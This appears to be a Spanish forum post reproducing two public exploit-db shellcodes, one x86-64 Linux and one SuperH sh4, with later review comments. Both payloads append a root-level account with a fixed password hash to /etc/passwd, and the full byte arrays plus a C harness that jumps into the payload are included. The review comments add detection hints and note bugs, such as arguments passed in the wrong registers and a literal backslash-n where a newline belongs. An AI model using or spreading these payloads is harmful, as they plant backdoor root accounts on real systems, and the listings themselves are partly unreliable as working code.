Último artículo de Shellcodes, ¡disfrutadlo! :D
http://www.exploit-db.com/exploits/18585/
;-----------------------------------------------------------------------------
; NOTE(review): two public shellcode listings follow, as reproduced on this
; page. Only line breaks and comments were restored/added; no instruction,
; operand or byte was changed.
;
; Listing 1 (NASM, x86-64 Linux, exploit-db 18585): appends one passwd record
; to /etc/passwd with open/write/close and exits. It grants nothing by itself:
; the write only succeeds when the running process can already write
; /etc/passwd (setreuid/setregid cannot raise privilege the process lacks).
; Defender-side detection points visible in the listing: a write to
; /etc/passwd from an unexpected process (auditd watch / file-integrity
; monitoring on /etc/passwd) and the appearance of a new UID 0 account.
;-----------------------------------------------------------------------------
;Linux x86_64 - add user with passwd (189 bytes)
;sc_adduser01.S
;Arch: x86_64, Linux
;
;Author: 0_o -- null_null
; nu11.nu11 [at] yahoo.com
;Date: 2012-03-05
;
;compile an executable: nasm -f elf64 sc_adduser.S; ld -o sc_adduser sc_adduser.o
;compile an object: nasm -o sc_adduser_obj sc_adduser.S
;
;Purpose: adds user "t0r" with password "Winner" to /etc/passwd
;executed syscalls: setreuid, setregid, open, write, close, exit
;Result: t0r:3UgT5tXKUkUFg:0:0::/root:/bin/bash
;syscall op codes: /usr/include/x86_64-linux-gnu/asm/unistd_64.h

BITS 64
[SECTION .text]

global _start

_start:

;sys_setreuid(uint ruid, uint euid)
; NOTE(review): on Linux x86-64 the syscall arguments travel in rdi, rsi, rdx,
; r10, r8, r9. rbx and rcx are not argument registers, so the ruid/euid this
; call actually receives are whatever rdi/rsi hold on entry (presumably zero
; when the kernel starts this as a fresh static executable -- verify). The
; return value in rax is not checked.
        xor     rax, rax
        mov     al, 113                 ;syscall sys_setreuid
        xor     rbx, rbx                ;arg 1 -- set real uid to root
        mov     rcx, rbx                ;arg 2 -- set effective uid to root
        syscall

;sys_setregid(uint rgid, uint egid)
; NOTE(review): same register mismatch as setreuid above (rbx/rcx are not the
; argument registers); result not checked.
        xor     rax, rax
        mov     al, 114                 ;syscall sys_setregid
        xor     rbx, rbx                ;arg 1 -- set real uid to root
        mov     rcx, rbx                ;arg 2 -- set effective uid to root
        syscall

;push all strings on the stack prior to file operations.
; Seven 8-byte pushes build two NUL-terminated strings in memory (little-endian,
; so each comment shows the bytes reversed). After the last push, rsp points to
; "t0r:3UgT5tXKUkUFg:0:0::/root:/bin/bash\n" (39 bytes + NUL) and rsp+40 to
; "/etc/passwd" (NUL-terminated). The two `shr rbx, 8` drop the 0xFF filler byte
; so a NUL terminator lands in the top byte without a NUL in the immediate.
        xor     rbx, rbx
        mov     ebx, 0x647773FF
        shr     rbx, 8
        push    rbx                     ;string \00dws
        mov     rbx, 0x7361702f6374652f
        push    rbx                     ;string sap/cte/
        mov     rbx, 0x0A687361622F6EFF
        shr     rbx, 8
        push    rbx                     ;string \00\nhsab/n
        mov     rbx, 0x69622F3A746F6F72
        push    rbx                     ;string ib/:toor
        mov     rbx, 0x2F3A3A303A303A67
        push    rbx                     ;string /::0:0:g
        mov     rbx, 0x46556B554B587435
        push    rbx                     ;string FUkUKXt5
        mov     rbx, 0x546755333A723074
        push    rbx                     ;string TgU3:r0t

;prelude to doing anything useful...
; rbx = base of the pushed strings; it is the only register that must survive
; until the write below.
        mov     rbx, rsp                ;save stack pointer for later use
        push    rbp                     ;store base pointer to stack so it can be restored later
        mov     rbp, rsp                ;set base pointer to current stack pointer

;sys_open(char* fname, int flags, int mode)
; NOTE(review): 0x0401 = O_WRONLY (1) | O_APPEND (0x400). `mov si, ...` writes
; only the low 16 bits of rsi; the upper bits keep whatever was there. The mode
; argument (rdx) is never set, which is harmless without O_CREAT. The slot at
; [rbp - 16] is written here but never read again in this listing. The open
; result is not checked: on failure rax holds -errno and the later write/close
; operate on that bogus "fd" and simply fail.
        sub     rsp, 16
        mov     [rbp - 16], rbx         ;store pointer to "t0r..../bash"
        mov     si, 0x0401              ;arg 2 -- flags
        mov     rdi, rbx
        add     rdi, 40                 ;arg 1 -- pointer to "/etc/passwd"
        xor     rax, rax
        mov     al, 2                   ;syscall sys_open
        syscall

;sys_write(uint fd, char* buf, uint size)
; Appends the 39-byte record (trailing "\n" included, NUL excluded) at the end
; of the file because of O_APPEND.
        mov     [rbp - 4], eax          ;arg 1 -- fd is retval of sys_open. save fd to stack for later use.
        mov     rcx, rbx                ;arg 2 -- load rcx with pointer to string "t0r.../bash"
        xor     rdx, rdx
        mov     dl, 39                  ;arg 3 -- load rdx with size of string "t0r.../bash\00"
        mov     rsi, rcx                ;arg 2 -- move to source index register
        mov     rdi, rax                ;arg 1 -- move to destination index register
        xor     rax, rax
        mov     al, 1                   ;syscall sys_write
        syscall

;sys_close(uint fd)
        xor     rdi, rdi
        mov     edi, [rbp - 4]          ;arg 1 -- load stored file descriptor to destination index register
        xor     rax, rax
        mov     al, 3                   ;syscall sys_close
        syscall

;sys_exit(int err_code)
; NOTE(review): the exit status is placed in rbx, not rdi, so the status the
; kernel sees is whatever rdi holds (the fd from the close above).
        xor     rax, rax
        mov     al, 60                  ;syscall sys_exit
        xor     rbx, rbx                ;arg 1 -- error code
        syscall

; NOTE(review): the two byte arrays below differ only in the encoding of the
; second setreuid/setregid argument (first array: `xor rcx, rcx` = 48 31 c9;
; second array: `mov rcx, rbx` = 48 89 d9, matching the source above).
;char shellcode[] =
; "\x48\x31\xc0\xb0\x71\x48\x31\xdb\x48\x31\xc9\x0f\x05\x48\x31"
; "\xc0\xb0\x72\x48\x31\xdb\x48\x31\xc9\x0f\x05\x48\x31\xdb\xbb"
; "\xff\x73\x77\x64\x48\xc1\xeb\x08\x53\x48\xbb\x2f\x65\x74\x63"
; "\x2f\x70\x61\x73\x53\x48\xbb\xff\x6e\x2f\x62\x61\x73\x68\x0a"
; "\x48\xc1\xeb\x08\x53\x48\xbb\x72\x6f\x6f\x74\x3a\x2f\x62\x69"
; "\x53\x48\xbb\x67\x3a\x30\x3a\x30\x3a\x3a\x2f\x53\x48\xbb\x35"
; "\x74\x58\x4b\x55\x6b\x55\x46\x53\x48\xbb\x74\x30\x72\x3a\x33"
; "\x55\x67\x54\x53\x48\x89\xe3\x55\x48\x89\xe5\x48\x83\xec\x10"
; "\x48\x89\x5d\xf0\x66\xbe\x01\x04\x48\x89\xdf\x48\x83\xc7\x28"
; "\x48\x31\xc0\xb0\x02\x0f\x05\x89\x45\xfc\x48\x89\xd9\x48\x31"
; "\xd2\xb2\x27\x48\x89\xce\x48\x89\xc7\x48\x31\xc0\xb0\x01\x0f"
; "\x05\x48\x31\xff\x8b\x7d\xfc\x48\x31\xc0\xb0\x03\x0f\x05\x48"
; "\x31\xc0\xb0\x3c\x48\x31\xdb\x0f\x05";
;
;equivalent code:
;
;char shellcode[] =
; "\x48\x31\xc0\xb0\x71\x48\x31\xdb\x48\x89\xd9\x0f\x05\x48\x31"
; "\xc0\xb0\x72\x48\x31\xdb\x48\x89\xd9\x0f\x05\x48\x31\xdb\xbb"
; "\xff\x73\x77\x64\x48\xc1\xeb\x08\x53\x48\xbb\x2f\x65\x74\x63"
; "\x2f\x70\x61\x73\x53\x48\xbb\xff\x6e\x2f\x62\x61\x73\x68\x0a"
; "\x48\xc1\xeb\x08\x53\x48\xbb\x72\x6f\x6f\x74\x3a\x2f\x62\x69"
; "\x53\x48\xbb\x67\x3a\x30\x3a\x30\x3a\x3a\x2f\x53\x48\xbb\x35"
; "\x74\x58\x4b\x55\x6b\x55\x46\x53\x48\xbb\x74\x30\x72\x3a\x33"
; "\x55\x67\x54\x53\x48\x89\xe3\x55\x48\x89\xe5\x48\x83\xec\x10"
; "\x48\x89\x5d\xf0\x66\xbe\x01\x04\x48\x89\xdf\x48\x83\xc7\x28"
; "\x48\x31\xc0\xb0\x02\x0f\x05\x89\x45\xfc\x48\x89\xd9\x48\x31"
; "\xd2\xb2\x27\x48\x89\xce\x48\x89\xc7\x48\x31\xc0\xb0\x01\x0f"
; "\x05\x48\x31\xff\x8b\x7d\xfc\x48\x31\xc0\xb0\x03\x0f\x05\x48"
; "\x31\xc0\xb0\x3c\x48\x31\xdb\x0f\x05";

;-------------------------------------------------------------------------------------
; http://www.exploit-db.com/exploits/17439/
; SuperH (sh4) Add root user with password
;
; NOTE(review): Listing 2 below is a separate C file (a SuperH sh4 payload
; wrapped in a C test harness, exploit-db 17439). It does the same thing as
; Listing 1 -- open/write/close on /etc/passwd, then exit -- and again relies
; on the calling process already being allowed to write that file. The same
; /etc/passwd write-monitoring and new-UID-0-account alerts apply.
;-------------------------------------------------------------------------------------
/*
** Title: Linux/SuperH - sh4 - add root user with password - 143 bytes
** Date: 2011-06-23
** Tested on: debian-sh4 2.6.32-5-sh7751r
** Author: Jonathan Salwan - twitter: @jonathansalwan
**
** http://shell-storm.org
**
** Informations:
** -------------
** - user: shell-storm
** - pswd: toor
** - uid : 0
**
** open:
**   NOTE(review): r5 = 255*4 + 69 = 1089 = 0x441 = O_WRONLY|O_CREAT|O_APPEND and
**   r6 = 84*5 = 420 = 0644, which is what the comment on SC below states; the
**   multiplications avoid immediates the 8-bit `mov #imm` form cannot hold.
**   r0 = pc-relative address of the "@@@/etc/passwd" string (the "@@@" pad is
**   the author's alignment filler; the path itself starts 3 bytes in).
** mov #5, r3
** mova @(130, pc), r0
** mov r0, r4
** mov #255, r13
** mov #4, r12
** mul.l r13, r12
** sts macl, r5
** add #69, r5
** mov #84, r13
** mov #5, r12
** mul.l r13, r12
** sts macl, r6
** trapa #2
** mov r0, r11
**
** write:
**   NOTE(review): writes 72 bytes from the user string. In the byte array the
**   string ends with 0x5c 0x6e (a literal backslash followed by 'n', 73 bytes
**   in total), not the 0x0a newline the .string below suggests, so the 72-byte
**   write ends at the backslash and appends no newline -- the written record
**   differs from the documented one.
** xor r6, r6
** xor r5, r5
** mov #4, r3
** mov r11, r4
** mova @(20, pc), r0
** mov r0, r5
** mov #72, r6
** trapa #2
**
** close:
** mov #6, r3
** mov r11, r4
** trapa #2
**
** exit:
** mov #1, r3
** xor r4, r4
** trapa #2
**
** user:
** .string "shell-storm:$1$KQYl/yru$PMt02zUTWmMvPWcU4oQLs/:0:0:root:/root:/bin/bash\n"
**
** file:
** .string "@@@/etc/passwd"
**
**
** The '@@@' is just for alignment.
**
*/
/* NOTE(review): the header names were lost when the page was extracted;
 * fprintf needs <stdio.h> and strlen needs <string.h>. */
#include
#include

/* Raw sh4 payload bytes. Placed in a writable data mapping, which on systems
 * enforcing W^X/NX is not executable; the indirect call in main() then faults
 * instead of running the bytes. */
char *SC =
/* open("/etc/passwd", O_WRONLY|O_CREAT|O_APPEND, 0644) = fd */
"\x05\xe3\x20\xc7\x03\x64\xff\xed"
"\x04\xec\xd7\x0c\x1a\x05\x45\x75"
"\x54\xed\x05\xec\xd7\x0c\x1a\x06"
"\x02\xc3"
/* r11 = fd */
"\x03\x6b"
/* write(fd, "shell-storm:$1$KQYl/yru$PMt02zUTW"..., 72) */
"\x6a\x26\x5a\x25\x04\xe3\xb3\x64"
"\x04\xc7\x03\x65\x48\xe6\x02\xc3"
/* close(fd) */
"\x06\xe3\xb3\x64\x02\xc3"
/* exit(0) */
"\x01\xe3\x4a\x24\x02\xc3"
/* shell-storm:$1$KQYl/yru$PMt02zUTWmMvPWcU4oQLs/:0:0:root:/root:/bin/bash\n */
/* NOTE(review): the final two bytes below are '\\' and 'n', not a newline. */
"\x73\x68\x65\x6c\x6c\x2d\x73\x74"
"\x6f\x72\x6d\x3a\x24\x31\x24\x4b"
"\x51\x59\x6c\x2f\x79\x72\x75\x24"
"\x50\x4d\x74\x30\x32\x7a\x55\x54"
"\x57\x6d\x4d\x76\x50\x57\x63\x55"
"\x34\x6f\x51\x4c\x73\x2f\x3a\x30"
"\x3a\x30\x3a\x72\x6f\x6f\x74\x3a"
"\x2f\x72\x6f\x6f\x74\x3a\x2f\x62"
"\x69\x6e\x2f\x62\x61\x73\x68\x5c"
"\x6e"
/* @@@/etc/passwd */
"\x40\x40\x40\x2f\x65\x74\x63\x2f"
"\x70\x61\x73\x73\x77\x64";

/* Test harness: prints the payload length and jumps into it.
 * NOTE(review): strlen returns size_t but the format uses %d (undefined
 * behaviour; %zu is the matching conversion). strlen also stops at the first
 * NUL byte, so the printed length is only right while the payload contains
 * none. The indirect call never returns on success because the payload exits. */
int main(void)
{
  fprintf(stdout,"Length: %d\n",strlen(SC));
  (*(void(*)()) SC)();
  return 0;
}
Esto me recuerda los "pokes" que salían en la Micromanía... ¡qué tiempos!!!